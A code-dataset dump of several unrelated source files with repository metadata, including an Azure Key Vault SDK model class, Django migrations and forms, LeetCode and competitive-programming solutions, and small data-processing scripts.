     setting is effective only if soft delete is also enabled. Enabling this functionality is
     irreversible - that is, the property does not accept false as its value.
    :vartype enable_purge_protection: bool
    :ivar network_acls: Rules governing the accessibility of the key vault from specific network
     locations.
    :vartype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
    :ivar provisioning_state: Provisioning state of the vault. Known values are: "Succeeded" and
     "RegisteringDns".
    :vartype provisioning_state: str or
     ~azure.mgmt.keyvault.v2021_10_01.models.VaultProvisioningState
    :ivar private_endpoint_connections: List of private endpoint connections associated with the
     key vault.
    :vartype private_endpoint_connections:
     list[~azure.mgmt.keyvault.v2021_10_01.models.PrivateEndpointConnectionItem]
    :ivar public_network_access: Property to specify whether the vault will accept traffic from
     public internet. If set to 'disabled' all traffic except private endpoint traffic and that that
     originates from trusted services will be blocked. This will override the set firewall rules,
     meaning that even if the firewall rules are present we will not honor the rules.
    :vartype public_network_access: str
    """

    # Validation metadata consumed by the serializer: required fields must be
    # present in requests; readonly fields are server-populated and never sent.
    _validation = {
        "tenant_id": {"required": True},
        "sku": {"required": True},
        "hsm_pool_resource_id": {"readonly": True},
        "private_endpoint_connections": {"readonly": True},
    }

    # Maps python attribute names to wire (JSON) keys and msrest type strings.
    _attribute_map = {
        "tenant_id": {"key": "tenantId", "type": "str"},
        "sku": {"key": "sku", "type": "Sku"},
        "access_policies": {"key": "accessPolicies", "type": "[AccessPolicyEntry]"},
        "vault_uri": {"key": "vaultUri", "type": "str"},
        "hsm_pool_resource_id": {"key": "hsmPoolResourceId", "type": "str"},
        "enabled_for_deployment": {"key": "enabledForDeployment", "type": "bool"},
        "enabled_for_disk_encryption": {"key": "enabledForDiskEncryption", "type": "bool"},
        "enabled_for_template_deployment": {"key": "enabledForTemplateDeployment", "type": "bool"},
        "enable_soft_delete": {"key": "enableSoftDelete", "type": "bool"},
        "soft_delete_retention_in_days": {"key": "softDeleteRetentionInDays", "type": "int"},
        "enable_rbac_authorization": {"key": "enableRbacAuthorization", "type": "bool"},
        "create_mode": {"key": "createMode", "type": "str"},
        "enable_purge_protection": {"key": "enablePurgeProtection", "type": "bool"},
        "network_acls": {"key": "networkAcls", "type": "NetworkRuleSet"},
        "provisioning_state": {"key": "provisioningState", "type": "str"},
        "private_endpoint_connections": {
            "key": "privateEndpointConnections",
            "type": "[PrivateEndpointConnectionItem]",
        },
        "public_network_access": {"key": "publicNetworkAccess", "type": "str"},
    }

    def __init__(
        self,
        *,
        tenant_id: str,
        sku: "_models.Sku",
        access_policies: Optional[List["_models.AccessPolicyEntry"]] = None,
        vault_uri: Optional[str] = None,
        enabled_for_deployment: Optional[bool] = None,
        enabled_for_disk_encryption: Optional[bool] = None,
        enabled_for_template_deployment: Optional[bool] = None,
        enable_soft_delete: bool = True,
        soft_delete_retention_in_days: int = 90,
        enable_rbac_authorization: bool = False,
        create_mode: Optional[Union[str, "_models.CreateMode"]] = None,
        enable_purge_protection: Optional[bool] = None,
        network_acls: Optional["_models.NetworkRuleSet"] = None,
        provisioning_state: Optional[Union[str, "_models.VaultProvisioningState"]] = None,
        public_network_access: str = "enabled",
        **kwargs: Any
    ) -> None:
        """
        :keyword tenant_id: The Azure Active Directory tenant ID that should be used for authenticating
         requests to the key vault. Required.
        :paramtype tenant_id: str
        :keyword sku: SKU details. Required.
        :paramtype sku: ~azure.mgmt.keyvault.v2021_10_01.models.Sku
        :keyword access_policies: An array of 0 to 1024 identities that have access to the key vault.
         All identities in the array must use the same tenant ID as the key vault's tenant ID. When
         ``createMode`` is set to ``recover``\ , access policies are not required. Otherwise, access
         policies are required.
        :paramtype access_policies: list[~azure.mgmt.keyvault.v2021_10_01.models.AccessPolicyEntry]
        :keyword vault_uri: The URI of the vault for performing operations on keys and secrets.
        :paramtype vault_uri: str
        :keyword enabled_for_deployment: Property to specify whether Azure Virtual Machines are
         permitted to retrieve certificates stored as secrets from the key vault.
        :paramtype enabled_for_deployment: bool
        :keyword enabled_for_disk_encryption: Property to specify whether Azure Disk Encryption is
         permitted to retrieve secrets from the vault and unwrap keys.
        :paramtype enabled_for_disk_encryption: bool
        :keyword enabled_for_template_deployment: Property to specify whether Azure Resource Manager is
         permitted to retrieve secrets from the key vault.
        :paramtype enabled_for_template_deployment: bool
        :keyword enable_soft_delete: Property to specify whether the 'soft delete' functionality is
         enabled for this key vault. If it's not set to any value(true or false) when creating new key
         vault, it will be set to true by default. Once set to true, it cannot be reverted to false.
        :paramtype enable_soft_delete: bool
        :keyword soft_delete_retention_in_days: softDelete data retention days. It accepts >=7 and
         <=90.
        :paramtype soft_delete_retention_in_days: int
        :keyword enable_rbac_authorization: Property that controls how data actions are authorized.
         When true, the key vault will use Role Based Access Control (RBAC) for authorization of data
         actions, and the access policies specified in vault properties will be ignored. When false,
         the key vault will use the access policies specified in vault properties, and any policy stored
         on Azure Resource Manager will be ignored. If null or not specified, the vault is created with
         the default value of false. Note that management actions are always authorized with RBAC.
        :paramtype enable_rbac_authorization: bool
        :keyword create_mode: The vault's create mode to indicate whether the vault need to be
         recovered or not. Known values are: "recover" and "default".
        :paramtype create_mode: str or ~azure.mgmt.keyvault.v2021_10_01.models.CreateMode
        :keyword enable_purge_protection: Property specifying whether protection against purge is
         enabled for this vault. Setting this property to true activates protection against purge for
         this vault and its content - only the Key Vault service may initiate a hard, irrecoverable
         deletion. The setting is effective only if soft delete is also enabled. Enabling this
         functionality is irreversible - that is, the property does not accept false as its value.
        :paramtype enable_purge_protection: bool
        :keyword network_acls: Rules governing the accessibility of the key vault from specific network
         locations.
        :paramtype network_acls: ~azure.mgmt.keyvault.v2021_10_01.models.NetworkRuleSet
        :keyword provisioning_state: Provisioning state of the vault. Known values are: "Succeeded" and
         "RegisteringDns".
        :paramtype provisioning_state: str or
         ~azure.mgmt.keyvault.v2021_10_01.models.VaultProvisioningState
        :keyword public_network_access: Property to specify whether the vault will accept traffic from
         public internet. If set to 'disabled' all traffic except private endpoint traffic and that that
         originates from trusted services will be blocked. This will override the set firewall rules,
         meaning that even if the firewall rules are present we will not honor the rules.
        :paramtype public_network_access: str
        """
        super().__init__(**kwargs)
        self.tenant_id = tenant_id
        self.sku = sku
        self.access_policies = access_policies
        self.vault_uri = vault_uri
        self.hsm_pool_resource_id = None  # read-only; populated by the server
        self.enabled_for_deployment = enabled_for_deployment
        self.enabled_for_disk_encryption = enabled_for_disk_encryption
        self.enabled_for_template_deployment = enabled_for_template_deployment
        self.enable_soft_delete = enable_soft_delete
        self.soft_delete_retention_in_days = soft_delete_retention_in_days
        self.enable_rbac_authorization = enable_rbac_authorization
        self.create_mode = create_mode
        self.enable_purge_protection = enable_purge_protection
        self.network_acls = network_acls
        self.provisioning_state = provisioning_state
        self.private_endpoint_connections = None  # read-only; populated by the server
        self.public_network_access = public_network_access
class VirtualNetworkRule(_serialization.Model):
    """A rule that grants a specific virtual-network subnet access to a vault.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Full resource id of a vnet subnet, such as
     '/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
     Required.
    :vartype id: str
    :ivar ignore_missing_vnet_service_endpoint: Property to specify whether NRP will ignore the
     check if parent subnet has serviceEndpoints configured.
    :vartype ignore_missing_vnet_service_endpoint: bool
    """

    # Serialization metadata consumed by the base _serialization.Model.
    _validation = {
        "id": {"required": True},
    }
    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "ignore_missing_vnet_service_endpoint": {"key": "ignoreMissingVnetServiceEndpoint", "type": "bool"},
    }

    def __init__(
        self,
        *,
        id: str,  # pylint: disable=redefined-builtin
        ignore_missing_vnet_service_endpoint: Optional[bool] = None,
        **kwargs: Any
    ) -> None:
        """
        :keyword id: Full resource id of the vnet subnet to allow, such as
         '/subscriptions/subid/resourceGroups/rg1/providers/Microsoft.Network/virtualNetworks/test-vnet/subnets/subnet1'.
         Required.
        :paramtype id: str
        :keyword ignore_missing_vnet_service_endpoint: Property to specify whether NRP will ignore
         the check if parent subnet has serviceEndpoints configured.
        :paramtype ignore_missing_vnet_service_endpoint: bool
        """
        super().__init__(**kwargs)
        self.ignore_missing_vnet_service_endpoint = ignore_missing_vnet_service_endpoint
        self.id = id
| [
"noreply@github.com"
] | Azure.noreply@github.com |
f7d836cffddca933e0110c1cf6abb4867b2437a0 | a140b45f9f16b74353d15ed573ea765b3fef046d | /algorithms/leet.0703.src.1.py | b36a1c7529c8b932d297432e523a94f045ad3ef2 | [] | no_license | fish-ball/leetcode | 258d4b37f05560d914bcd29f7c54820deeadb33f | 3dfd8f73c65d43cc2766c20700a619141acb927b | refs/heads/master | 2023-05-28T18:32:43.638675 | 2023-05-20T04:25:23 | 2023-05-20T04:25:23 | 31,968,994 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 457 | py | import heapq
class KthLargest:
    """Stream processor that reports the k-th largest element seen so far.

    A min-heap of at most ``k`` elements holds the ``k`` largest values
    observed; its root (``self.nums[0]``) is therefore the k-th largest
    overall. Queries are O(1) after an O(log k) update.
    """

    def __init__(self, k: int, nums: List[int]):
        """Initialize with target rank ``k`` and the initial stream ``nums``."""
        self.k = k
        self.nums = nums
        heapq.heapify(self.nums)
        # Trim to k elements up front (the original deferred this to the
        # first add() call), keeping memory at O(k) and establishing the
        # invariant "nums holds the k largest values" immediately.
        while len(self.nums) > k:
            heapq.heappop(self.nums)

    def add(self, val: int) -> int:
        """Insert ``val`` into the stream and return the k-th largest value."""
        if len(self.nums) < self.k:
            heapq.heappush(self.nums, val)
        else:
            # Single O(log k) combined operation instead of a push
            # followed by a pop loop.
            heapq.heappushpop(self.nums, val)
        return self.nums[0]
# Your KthLargest object will be instantiated and called as such:
# obj = KthLargest(k, nums)
# param_1 = obj.add(val)
| [
"noreply@github.com"
] | fish-ball.noreply@github.com |
a7b2ab6cad42ec68d2b70750712b01acfc831215 | 11dbcc94972a370d92b190cc071826d90ae3ff84 | /conjugation/migrations/0014_auto_20180412_1343.py | 3813e57c26684e4265033d31da78c4628acbf6c0 | [
"Apache-2.0"
] | permissive | 5CORNERS/www.le-francais.ru | ef99b401c24eb7a2b84c04bdf638fc7460e05d81 | ab1a77f99a53b4b66a1c4961c335a288ae38b40d | refs/heads/master | 2023-09-01T15:59:46.534050 | 2023-03-14T15:18:45 | 2023-03-14T15:18:45 | 10,008,050 | 5 | 2 | Apache-2.0 | 2023-08-19T19:17:19 | 2013-05-12T02:06:15 | Python | UTF-8 | Python | false | false | 438 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-04-12 10:43
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Rename ``Verb.no_female`` to ``Verb.masculin_only`` (auto-generated).

    Pure column rename; no data transformation is performed.
    """
    dependencies = [
        ('conjugation', '0013_auto_20180412_1321'),
    ]
    operations = [
        migrations.RenameField(
            model_name='verb',
            old_name='no_female',
            new_name='masculin_only',
        ),
    ]
| [
"anton.dumov@gmail.com"
] | anton.dumov@gmail.com |
4a4ea8d341833f55cde5f4b145d6add741371c2b | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02788/s685748566.py | 41028a13b217903ab98ffe4b1a1224e7edb5ce04 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | import math
from bisect import bisect_right
def solve(n, d, a, monsters):
    """Return the minimum number of bombs needed to kill all monsters.

    Each bomb deals ``a`` damage to every monster within distance ``d``
    of its centre, i.e. an interval of width ``2*d``. Greedy strategy:
    sweep the monsters left to right and detonate just enough bombs at
    the leftmost surviving monster, so the blast interval
    ``[x, x + 2*d]`` extends as far right as possible. Damage already
    committed is tracked with a difference array, giving O(n log n).

    :param n: number of monsters
    :param d: blast radius of a bomb
    :param a: damage dealt per bomb
    :param monsters: iterable of ``(position, health)`` pairs
    :return: minimal total number of bombs
    """
    pts = sorted((x - 1, h) for x, h in monsters)
    xs = [p[0] for p in pts]
    damage = [0] * n  # difference array of damage dealt by earlier bombs
    bombs = 0
    for i, (x, h) in enumerate(pts):
        if i:
            damage[i] += damage[i - 1]  # prefix-sum: damage landing here
        need = max(math.ceil((h - damage[i]) / a), 0)
        bombs += need
        damage[i] += need * a
        # Bombs centred at x stop affecting monsters beyond x + 2*d.
        end = bisect_right(xs, x + 2 * d)
        if end < n:
            damage[end] -= need * a
    return bombs


if __name__ == '__main__':
    n, d, a = map(int, input().split())
    monsters = [tuple(map(int, input().split())) for _ in range(n)]
    print(solve(n, d, a, monsters))
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7c5ab14f132e8abc3055cf0b989fb0c5a14bba46 | 926b4949f31b99e68e07fdc5c181becf90870e26 | /BioCrowd/apps/login/forms.py | 04860331c93eb7eb4fb2c786d72126591d52af87 | [] | no_license | bxm156/BioCrowd | a563728212d712bc4bfd2cd4b0204789a0a8cc7b | de407fc1640cccbc5354de0dfeb3586fec792899 | refs/heads/master | 2021-01-13T02:14:14.844716 | 2013-05-15T01:15:04 | 2013-05-15T01:15:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,226 | py | from django.contrib.auth.forms import AuthenticationForm
from django import forms
from crispy_forms.layout import Submit, Layout, Fieldset, Field
from crispy_forms.bootstrap import FormActions
from crispy_forms.helper import FormHelper
class CrispyAuthenticationForm(AuthenticationForm):
    """Login form rendered with django-crispy-forms / Bootstrap classes.

    Extends Django's stock ``AuthenticationForm`` with a "remember me"
    checkbox and configures a crispy ``FormHelper`` layout whose inputs
    use placeholders instead of visible labels.
    """
    # label="" suppresses the rendered <label>; the placeholders in the
    # Layout below serve as the visible prompts.
    username = forms.CharField(max_length=254, label="")
    password = forms.CharField(label="", widget=forms.PasswordInput)
    remember_me = forms.BooleanField(required=False)
    def __init__(self, *args, **kwargs):
        super(CrispyAuthenticationForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper()
        self.helper.form_id = 'id-login'
        self.helper.form_method = 'post'
        self.helper.form_action = '/login/'
        # form_tag=False: presumably the surrounding template renders its
        # own <form> element -- confirm against the login template.
        self.helper.form_tag = False
        self.helper.layout = Layout(
            Field('username', label='', placeholder="Email address", css_class="input-block-level"),
            Field('password', label='', placeholder="Password", css_class="input-block-level"),
            'remember_me',
            Submit('submit', 'Sign in', css_class="btn-large")
        )
        #self.helper.filter(basestring, greedy=True).wrap(Field, css_class="input-xlarge")
"bxm156@case.edu"
] | bxm156@case.edu |
c383e7a60082d7a8dadc8d9296c4db641dfa7a47 | 307d3837d31f9e3728af2b62ca51ebf63fe6ec6b | /hall_of_fame/kimdonghun/[BOJ]2775_IWillBeAWomenPresident.py | e10e3178d5f2338e9e890aeb876d3a082e2d1843 | [] | no_license | ellynhan/challenge100-codingtest-study | 905043497d154b8a7333ca536e536d013f6e7454 | bcdc6d04f13b12ba80b42e066f9d244d7c2cc698 | refs/heads/master | 2023-09-01T14:10:13.481013 | 2023-08-27T14:38:52 | 2023-08-27T14:38:52 | 401,561,230 | 162 | 176 | null | 2023-09-09T14:56:25 | 2021-08-31T03:30:36 | C++ | UTF-8 | Python | false | false | 413 | py | import sys
import math
T = int(sys.stdin.readline())
for i in range(T) :
K = int(sys.stdin.readline())
N = int(sys.stdin.readline())
m_list = [0] * (N+1)
for l in range(N+1) :
m_list[l] = l
for j in range(K) :
for l in range(1, N+1) :
m_list[l] = m_list[l] + m_list[l-1]
#print(m_list)
print(m_list[N])
| [
"wown252@naver.com"
] | wown252@naver.com |
672b5ae11c94cbd93c53a45adbed6015e142ce3e | 3f6088cf1aaaddc18ca1c6f2d5bfc69590941d60 | /Xianyang_dwt/projects/gbrt_multi_step_one_month.py | 1a6086934a4a27dec07cefec4a9b627a52b417ca | [
"MIT"
] | permissive | YX577/MonthlyRunoffForecastByAutoReg | 80038b1b0401d0dbe9b4b67cf531298090815cf7 | 2d66c628141f001e4ffb3dc3b7520a0f0f0ff239 | refs/heads/master | 2022-03-30T10:48:30.165288 | 2020-01-17T02:36:47 | 2020-01-17T02:36:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | import matplotlib.pyplot as plt
import os
root_path = os.path.dirname(os.path.abspath('__file__'))
from variables import multi_step_lags
import sys
sys.path.append(root_path)
from models import multi_step_gbrt
if __name__ == '__main__':
multi_step_gbrt(
root_path=root_path,
station='Xianyang',
decomposer='dwt',
predict_pattern='forecast',
llags_dict = variables['lags_dict'],
model_id=1
)
plt.show()
| [
"zuojianyi@outlook.com"
] | zuojianyi@outlook.com |
599a5100c97cb2e4253e1355234bd786899eb985 | 3bec37b9145af3381f1bbc55745d3ef193694c46 | /presentation/performance/bimodal.py | 965f31acae633b21499c738a90af24fdf56d0dc8 | [] | no_license | nuria/study | c00fa8776514ba4343d9923a9e61af5482d7454c | 57ddbafc762da7c8756b475f016c92bf391bc370 | refs/heads/master | 2023-08-05T01:00:48.923046 | 2023-07-22T14:54:48 | 2023-07-22T14:54:48 | 7,290,586 | 5 | 20 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | #!/usr/local/bin/python
import matplotlib.pyplot as pl
x = [10,10,20,20,20,20,20, 30,30, 30, 30, 40, 40, 60,70, 70, 70, 70, 80, 80, 80, 80, 80, 90, 90, 100]
bins = [10,20,30,40,50,60,70,80,90,100]
pl.hist(x, bins, color=('pink'))
pl.ylim(ymax=6)
pl.title("Test Scores")
pl.xlabel("Score")
pl.show()
| [
"nuria@wikimedia.org"
] | nuria@wikimedia.org |
3846a652621902896625e7dd95b162936569cd06 | 7fb805dc0789bfa3bbac7a94b667548c01a8eb4a | /site-packages/warlock/__init__.py | 966b75d55f9e56c8f366ebc621f386734e4bee21 | [
"Python-2.0"
] | permissive | hclareth7/freezer_libraries | 8a6173140971679e5b5dc8428e1e56734f02d906 | e0bd890eba5e7438976fb3b4d66c41c128bab790 | refs/heads/master | 2022-11-30T02:19:46.718660 | 2019-05-29T20:29:20 | 2019-05-29T20:29:20 | 189,293,415 | 0 | 1 | NOASSERTION | 2022-11-17T05:38:07 | 2019-05-29T20:28:12 | Python | UTF-8 | Python | false | false | 713 | py | # Copyright 2012 Brian Waldon
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Public-facing Warlock API"""
from warlock.core import model_factory # NOQA
from warlock.exceptions import InvalidOperation # NOQA
| [
"root@ubuntu-14.04.general.micro.yul.linux.novalocal"
] | root@ubuntu-14.04.general.micro.yul.linux.novalocal |
6cb9fd58900ec505001f59b51e1c295c89baff3d | 6045075c734d65a3cec63d3ae15f8f9f13836559 | /solutions/0077_Combinations/recur_self.py | c534028c6b36b89e0714d0278ffe0c21c214e2c0 | [] | no_license | zh-wang/leetcode | c058470fdf84fb950e3d4f974b27826718942d05 | 6322be072e0f75e2da28b209c1dbb31593e5849f | refs/heads/master | 2021-12-28T02:49:11.964213 | 2021-08-25T06:29:21 | 2021-08-25T06:29:21 | 189,919,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
# combine(n, k) = combine(n-1, i-1) + [i], k <= i <= n
# 1. For the element we pick for combine(n, k),
# we can pick it from k to n, cause we need at least k elements to form the answer.
# (We know that the first, or minimal in sequence order, is 1, 2, ..., k)
# 2. After picker i, the problem falls down to a sub-problem combine(i-1, k-1),
# mean that we need to choose k-1 elements from i-1 values.
if k == 0:
return [[]]
return [pre + [i] for i in range(k, n+1) for pre in self.combine(i-1, k-1)]
| [
"viennakanon@gmail.com"
] | viennakanon@gmail.com |
3812936abe41673337ae02dc7f1dcaa153745673 | 5be8b0f2ee392abeee6970e7a6364ac9a5b8ceaa | /xiaojian/forth_phase/spider/day09/spider_day09_note_course/day09/Test/Test/proxies.py | fde6501a77012465746a28724407c37aa732ba45 | [] | no_license | Wellsjian/20180826 | 424b65f828f0174e4d568131da01dafc2a36050a | 0156ad4db891a2c4b06711748d2624080578620c | refs/heads/master | 2021-06-18T12:16:08.466177 | 2019-09-01T10:06:44 | 2019-09-01T10:06:44 | 204,462,572 | 0 | 1 | null | 2021-04-20T18:26:03 | 2019-08-26T11:38:09 | JavaScript | UTF-8 | Python | false | false | 65 | py | proxy_list = [
'http://1.1.1.1:1111',
'http://2.2.2.2:2222'
] | [
"1149158963@qq.com"
] | 1149158963@qq.com |
c9366d2c943f63b4c637c861fa71090d1af49555 | c91d029b59f4e6090a523bf571b3094e09852258 | /src/produto/migrations/0021_produtotamanho_descricao.py | d5cbafd682e15e63f33be66a3c4d365186036266 | [
"MIT"
] | permissive | anselmobd/fo2 | d51b63ebae2541b00af79448ede76b02638c41f0 | 8e7f8f3d9a296c7da39d0faf38a266e9c6c162ab | refs/heads/master | 2023-08-31T19:59:33.964813 | 2023-08-31T19:50:53 | 2023-08-31T19:50:53 | 92,856,677 | 1 | 0 | MIT | 2023-04-21T21:50:46 | 2017-05-30T17:04:27 | Python | UTF-8 | Python | false | false | 503 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2019-04-29 19:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a free-text ``descricao`` field to ProdutoTamanho (auto-generated).

    The field defaults to the empty string, so existing rows need no
    explicit back-fill.
    """
    dependencies = [
        ('produto', '0020_produtocor_descricao'),
    ]
    operations = [
        migrations.AddField(
            model_name='produtotamanho',
            name='descricao',
            field=models.CharField(default='', max_length=200, verbose_name='descrição'),
        ),
    ]
"anselmo.blanco.dominguez+github@gmail.com"
] | anselmo.blanco.dominguez+github@gmail.com |
a522239343b1e09f2c5134b508faa2f98456ebbb | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pandas/_config/config.py | 788bdbb89a23217a4a35e3dbccf570e3d3fa075f | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:947b386607f6b3f78c6e96a0c9aaa85d0fd62af2fb3fc31d67c95cfeec3e83d4
size 22977
| [
"github@cuba12345"
] | github@cuba12345 |
c1e07b3cd70a17a10d69eea452c3c3ded007a6d6 | f620403443b2c0affaed53505c002f35dc68020c | /StreamGeneration/GlobalSortByTime.py | 6ed5583c67de689562fa1d548b710d9c6a8cab7f | [] | no_license | ZhuJiahui/CTMTS | c552b3026deb47879f9aa5bde4b002cf6283858d | 9f8981f6e61900a68a38ae0392e01771beee9651 | refs/heads/master | 2021-01-12T10:18:27.579697 | 2016-12-14T02:23:29 | 2016-12-14T02:23:29 | 76,416,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,066 | py | # -*- coding: utf-8 -*-
'''
Created on 2014年7月22日
@author: ZhuJiahui506
'''
import os
import time
from operator import itemgetter
from TextToolkit import quick_write_list_to_text
def get_time_range(read_directory):
    '''
    Find the earliest and latest timestamps across all data files.

    :param read_directory: directory whose files contain tab-separated
        records with a '%Y/%m/%d %H:%M' timestamp in the third column.
    :return: (start_time, final_time, each_time_interval) -- epoch-second
        extremes plus a per-file [first, last] timestamp pair, ordered to
        match os.listdir(read_directory).
    '''
    time_series = []
    each_time_interval = []
    #file_number = sum([len(files) for root, dirs, files in os.walk(read_directory)])
    file_list = os.listdir(read_directory)
    for i in range(len(file_list)):
        print i
        f = open(read_directory + '/' + file_list[i], 'rb')
        line = f.readline()
        this_time_series = []
        while line:
            # Third tab-separated field is the record's timestamp.
            this_time = time.mktime(time.strptime(line.strip().split('\t')[2], '%Y/%m/%d %H:%M'))
            time_series.append(this_time)
            this_time_series.append(this_time)
            line = f.readline()
        f.close()
        # NOTE(review): assumes each file's records are already time-ordered,
        # so its first/last entries bound the file's interval -- confirm.
        each_time_interval.append([this_time_series[0], this_time_series[-1]])
    # Sort ascending so the global extremes sit at the ends.
    time_series = sorted(time_series)
    start_time = time_series[0]
    final_time = time_series[-1]
    print "The start time is: %f." % start_time
    print "The final time is: %f." % final_time
    return start_time, final_time, each_time_interval
def global_sort_by_time(start_time, final_time, each_time_interval, read_directory, write_directory):
    '''
    Merge all record files into time-sorted two-day segments.

    Walks the global time span in 2-day windows; for every window it
    gathers the records from all files whose interval overlaps the
    window, sorts them by timestamp, and writes one numbered output file
    per window.

    :param start_time: global earliest timestamp (epoch seconds).
    :param final_time: global latest timestamp (epoch seconds).
    :param each_time_interval: per-file [first, last] timestamps, aligned
        with os.listdir(read_directory).
    :param read_directory: directory of the raw per-source record files.
    :param write_directory: output directory for the segment files.
    '''
    print "Begin sorting."
    print "May take a long time, Please Wait..."
    file_list2 = os.listdir(read_directory)
    #start_time = 1388505600 # 2014/01/01 0:00
    # Align the window start to midnight; 28800 s is an 8-hour offset,
    # presumably UTC+8 (China Standard Time) -- confirm the data's timezone.
    start_time = int(start_time + 28800) / 86400 * 86400 - 28800
    segment_interval = 86400 * 2
    file_number = 1
    while start_time <= final_time:
        this_time_series = []
        this_file_texts = []
        print "Segment %d ." % file_number
        for i in range(len(file_list2)):
            # Only scan files whose [first, last] interval overlaps this window.
            if (start_time >= each_time_interval[i][0] and start_time <= each_time_interval[i][1]) or ((start_time + segment_interval) > each_time_interval[i][0] and (start_time + segment_interval) < each_time_interval[i][1]):
                f = open(read_directory + '/' + file_list2[i], 'rb')
                line = f.readline()
                while line:
                    this_time = time.mktime(time.strptime(line.strip().split('\t')[2], '%Y/%m/%d %H:%M'))
                    if this_time < (start_time + segment_interval) and this_time >= start_time:
                        this_time_series.append(this_time)
                        this_file_texts.append(line.strip())
                    elif this_time >= (start_time + segment_interval):
                        # Records are time-ordered, so nothing later can match.
                        break
                    else:
                        pass
                    line = f.readline()
                f.close()
        # All texts for this window collected; sort them by timestamp.
        tt = zip(this_time_series, this_file_texts)
        tt1 = sorted(tt, key = itemgetter(0))
        this_file_texts = []
        for each in tt1:
            this_file_texts.append(each[1])
        quick_write_list_to_text(this_file_texts, write_directory + "/" + str(file_number) + ".txt")
        file_number = file_number + 1
        start_time = start_time + segment_interval
    print "Global Sort Complete!!!"
    print "Total Segment %d ." % (file_number - 1)
if __name__ == '__main__':
    # time.clock() is Python 2 wall/CPU timing (removed in Python 3.8).
    start = time.clock()
    now_directory = os.getcwd()
    root_directory = os.path.dirname(now_directory) + '/'
    # Input/output directories live beside (one level above) this script's CWD.
    read_directory = root_directory + u'dataset/original_data'
    write_directory = root_directory + u'dataset/segment'
    if (not(os.path.exists(write_directory))):
        os.mkdir(write_directory)
    start_time, final_time, each_time_interval = get_time_range(read_directory)
    global_sort_by_time(start_time, final_time, each_time_interval, read_directory, write_directory)
    print 'Total time %f seconds' % (time.clock() - start)
    print 'Complete !!!'
| [
"zhujiahui@outlook.com"
] | zhujiahui@outlook.com |
3294126f04d6d5c3ee2390dfc9a57ecb73bc88e2 | 85af4750761974dd406edf614cfe74d0cfc5ba6f | /apps/users/migrations/0003_user_area.py | bd6e8ed903869ceabdc2691194afbe75c7dd7f5f | [] | no_license | Comunidad-de-Programadores/Team-Vue-14-Comfeco-Backend | ebdf9724b6963629c887370d2ddfb7ced072854e | e14856fe6d7b49289cd8cf4bca7e98556ec1ec96 | refs/heads/main | 2023-03-22T00:57:55.189866 | 2021-03-19T13:37:01 | 2021-03-19T13:37:01 | 337,901,217 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | # Generated by Django 3.1.1 on 2021-03-06 05:58
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the required ``area`` choice field to User (auto-generated).

    ``preserve_default=False``: the empty-string default exists only to
    back-fill existing rows during this migration and is not kept on the
    model afterwards.
    """
    dependencies = [
        ('users', '0002_auto_20210228_1300'),
    ]
    operations = [
        migrations.AddField(
            model_name='user',
            name='area',
            field=models.CharField(choices=[('F', 'Frontend'), ('B', 'Backend'), ('D', 'Devops'), ('V', 'Video Gamer Developer'), ('UIX', 'UI/UX'), ('DB', 'Data Base Developer'), ('CC', 'Cloud Computing')], default='', max_length=255),
            preserve_default=False,
        ),
    ]
| [
"danielhuamani15@gmail.com"
] | danielhuamani15@gmail.com |
3b4f675e1614fdb5809f39e201751cfadc0e0ad1 | 17248f16c4bf01b9b8257ba4855fb9d747bab100 | /windbgtool/debugger_load_breakpoints.py | 4cf7221dce572d52a6e2a50ec5afb20d89384a52 | [
"MIT"
] | permissive | fengjixuchui/windbgtool | 0d910596ab77c1482fbb8a9c82c381829baaa428 | 9dc759e983043ded2a8de143af24d94a3a4e4862 | refs/heads/master | 2020-08-17T14:57:48.968526 | 2019-10-17T06:02:19 | 2019-10-17T06:02:19 | 215,680,906 | 0 | 0 | MIT | 2019-10-17T06:02:22 | 2019-10-17T01:55:12 | null | UTF-8 | Python | false | false | 980 | py | import sys
import os
import time  # fix: time.strftime is used below but 'time' was never imported (NameError)
import logging
import windbgtool
from optparse import OptionParser, Option

# Command line:
